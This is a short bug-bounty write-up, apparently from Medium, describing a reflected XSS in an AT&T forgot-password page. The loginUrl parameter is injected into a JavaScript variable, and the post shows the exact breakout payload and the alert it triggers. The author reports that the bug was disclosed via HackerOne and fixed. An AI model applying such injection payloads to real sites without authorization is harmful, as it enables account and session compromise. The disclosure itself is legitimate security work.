Reflected XSS In AT&T [ $50 ]

Hi today. I want to share how i found xss in AT&T.
I find subdomain using google dork.

site:*.att.com

and watch all subdomain

When visit to ilm.att.com

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=https://ilm.att.com

It redirect to

https://ilm.att.com/bizportal/spp#/forgotPassword

& i check view source.I notice in js variable jsloginUrl

Like

var jsuserName = '';
var jsloginUrl = 'https://ilm.att.com';

That is input value of loginUrl param.I try to inject and i see in viewsource.

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl='"></;

var jsuserName = '';
var jsloginUrl = ''"></;';

It ok

Try to inject xss payload

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=x';alert(document.domain);x='

The payload is successfully injected to webpage

var jsuserName = '';
var jsloginUrl = 'x';alert(document.domain);x='';

I got alert.

I report to AT&T via hackerone.After 4 months ….. Bug is resolved.

I am not good in english but i try hard to understand what i write.See you in next bounty writeup

Thanks for reading

Edit . I got $50 award.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store